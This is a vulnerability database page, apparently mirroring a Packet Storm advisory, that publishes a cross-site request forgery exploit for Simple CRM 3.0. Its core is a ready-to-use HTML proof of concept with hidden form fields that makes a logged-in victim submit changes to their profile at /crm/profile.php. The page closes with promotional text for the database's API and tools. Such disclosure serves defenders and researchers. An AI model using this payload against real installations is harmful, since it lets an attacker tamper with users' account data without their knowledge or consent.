Lucene search
K

Simple CRM 3.0 Cross Site Request Forgery

🗓️ 20 Jun 2021 00:00:00Reported by Riadh BenlamineType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 124 Views

Simple CRM 3.0 CSRF Vulnerabilit

Code
`# Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)  
# Date: 20/06/2021  
# Exploit Author: Riadh Benlamine (rbn0x00)  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/small-crm-php/  
# Version: 3.0  
# Category: Webapps  
# Tested on: Apache2+MariaDB latest version  
# Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url  
  
Vulnerable page: /crm/profile.php  
  
POC:  
----  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="name" value="test" />  
<input type="hidden" name="alt_email" value="" />  
<input type="hidden" name="phone" value="0123456789" />  
<input type="hidden" name="gender" value="m" />  
<input type="hidden" name="address" value="jgjgjgjjggjcsrf" />  
<input type="hidden" name="update" value="Update" />  
<input type="submit" value="Exploit" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation